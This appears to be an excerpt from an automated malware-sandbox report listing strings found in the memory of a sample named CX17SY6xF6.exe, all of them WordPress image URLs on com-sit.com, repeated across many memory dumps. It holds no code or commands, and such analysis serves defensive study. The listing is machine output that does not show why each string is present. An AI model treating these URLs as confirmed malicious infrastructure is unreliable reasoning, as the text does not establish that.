                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-150x150.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-300x300.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-150x150.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-300x300.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-150x150.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-300x300.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5.png
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLACK-1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLUE-1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSKIN-1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSTROKe-1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_2.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_3.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_4.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_5.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_6.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile123.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile234.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobile456ENDE.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Mobilr567.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/N123.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/SimonJabocWEBDE.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitBROWN-1.jpg
                  Source: CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/comsitgreen-1.jpg
